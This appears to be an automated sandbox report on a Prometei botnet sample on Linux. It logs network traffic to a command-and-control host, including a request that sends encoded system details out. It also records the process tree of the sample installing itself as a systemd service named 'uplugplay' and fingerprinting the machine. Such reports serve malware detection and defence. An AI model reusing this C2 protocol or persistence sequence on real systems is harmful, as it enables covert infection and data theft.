                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jan 26, 2022 00:22:37.772116899 CET0OUTGET /cgi-bin/prometei.cgi?r=53&i=5HNN7ZK1006GY32G HTTP/1.0
                                                                                      Host: p3.feefreepool.net
                                                                                      Jan 26, 2022 00:22:50.014096975 CET1INHTTP/1.1 200 OK
                                                                                      Date: Tue, 25 Jan 2022 23:22:53 GMT
                                                                                      Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                                                                      Content-Length: 7
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=windows-1251
                                                                                      Data Raw: 73 79 73 69 6e 66 6f
                                                                                      Data Ascii: sysinfo


                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                      1192.168.2.235683288.198.246.24280
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jan 26, 2022 00:22:52.238411903 CET2OUTGET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0QE04MVkwSTFJUThCM1IyWk5IDQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDA6MjI6NTEgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuNzcsIDEuMTQsIDAuNDYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=5HNN7ZK1006GY32G&h=galassia&enckey=ZLIgKA9VenPwM5c9yeLOnmb3oEZqiSh9Tzvp/iPtq7XWt5J5uQ5caiCY6jlKxfjHiwtEFIzxvxeiWJeylm19FJ24k5cVIQ900f4GlpqIHIJlAcd3c6M1po5PO9+NKnm8Zl3CR7s4J8O8LmyYD13xgBOOE5tbighmR5xnqhAifpY= HTTP/1.0
                                                                                      Host: p3.feefreepool.net
                                                                                      Jan 26, 2022 00:22:57.764869928 CET3INHTTP/1.1 200 OK
                                                                                      Date: Tue, 25 Jan 2022 23:23:01 GMT
                                                                                      Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                                                                      Content-Length: 3
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=windows-1251
                                                                                      Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                                                                                      Data Ascii: ok!Content-type: text/html; charset=windows-1251


                                                                                      System Behavior

                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/dash
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/ls
                                                                                      Arguments:ls /etc/rc[S2345].d/S[0-9][0-9]cups
                                                                                      File size:142144 bytes
                                                                                      MD5 hash:e7793f15c2ff7e747b4bc7079f5cd4f7
                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/dash
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl --quiet is-active cups.service
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/logrotate
                                                                                      Arguments:n/a
                                                                                      File size:84056 bytes
                                                                                      MD5 hash:ff9f6831debb63e53a31ff8057143af6

                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/gzip
                                                                                      Arguments:/bin/gzip
                                                                                      File size:97496 bytes
                                                                                      MD5 hash:beef4e1f54ec90564d2acd57c0b0c897
                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/logrotate
                                                                                      Arguments:n/a
                                                                                      File size:84056 bytes
                                                                                      MD5 hash:ff9f6831debb63e53a31ff8057143af6

                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/rsyslog/rsyslog-rotate
                                                                                      Arguments:/usr/lib/rsyslog/rsyslog-rotate
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/rsyslog/rsyslog-rotate
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl kill -s HUP rsyslog.service
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:22:21
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:/tmp/nRlZAbNdJx
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:21
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:21
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pgrep nRlZAbNdJx"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:21
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:21
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pgrep
                                                                                      Arguments:pgrep nRlZAbNdJx
                                                                                      File size:30968 bytes
                                                                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                      Start time:00:22:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pidof nRlZAbNdJx"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:22
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pidof
                                                                                      Arguments:pidof nRlZAbNdJx
                                                                                      File size:27016 bytes
                                                                                      MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                                      Start time:00:22:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pgrep uplugplay"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:23
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pgrep
                                                                                      Arguments:pgrep uplugplay
                                                                                      File size:30968 bytes
                                                                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                      Start time:00:22:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pidof uplugplay"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:24
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pidof
                                                                                      Arguments:pidof uplugplay
                                                                                      File size:27016 bytes
                                                                                      MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                                      Start time:00:22:25
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:25
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pgrep upnpsetup"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:25
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:25
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pgrep
                                                                                      Arguments:pgrep upnpsetup
                                                                                      File size:30968 bytes
                                                                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                      Start time:00:22:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pidof upnpsetup"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:26
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pidof
                                                                                      Arguments:pidof upnpsetup
                                                                                      File size:27016 bytes
                                                                                      MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                                      Start time:00:22:28
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:28
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "systemctl daemon-reload"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:28
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:28
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl daemon-reload
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:22:29
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:29
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "systemctl enable uplugplay.service"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:30
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:30
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl enable uplugplay.service
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:22:32
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/nRlZAbNdJx
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:32
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "systemctl start uplugplay.service"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:33
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:33
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl start uplugplay.service
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:22:29
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:22:29
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                      File size:22760 bytes
                                                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                      Start time:00:22:32
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:22:32
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                      File size:22760 bytes
                                                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                      Start time:00:22:34
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:22:34
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:/usr/sbin/uplugplay
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:34
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:34
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:34
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:34
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:34
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:/usr/sbin/uplugplay -Dcomsvc
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "cat /proc/cpuinfo"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/cat
                                                                                      Arguments:cat /proc/cpuinfo
                                                                                      File size:43416 bytes
                                                                                      MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:49
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:22:50
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:50
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "dmidecode --type baseboard"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:50
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:50
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode --type baseboard
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:22:50
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:50
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c dmidecode
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:50
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:50
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/dmidecode
                                                                                      Arguments:dmidecode
                                                                                      File size:121856 bytes
                                                                                      MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "cat /etc/os-release"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/cat
                                                                                      Arguments:cat /etc/os-release
                                                                                      File size:43416 bytes
                                                                                      MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c uptime
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/uptime
                                                                                      Arguments:uptime
                                                                                      File size:14568 bytes
                                                                                      MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/uplugplay
                                                                                      Arguments:n/a
                                                                                      File size:426571 bytes
                                                                                      MD5 hash:c3e9e5145fad7c4d161f68f822662519

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "uname -a"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:51
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/uname
                                                                                      Arguments:uname -a
                                                                                      File size:39288 bytes
                                                                                      MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                                                                      Start time:00:22:44
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/dash
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:22:44
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/rm
                                                                                      Arguments:rm -f /tmp/tmp.09wTQqP0ri /tmp/tmp.Elrt5dWRAb /tmp/tmp.bCH853YTmb
                                                                                      File size:72056 bytes
                                                                                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b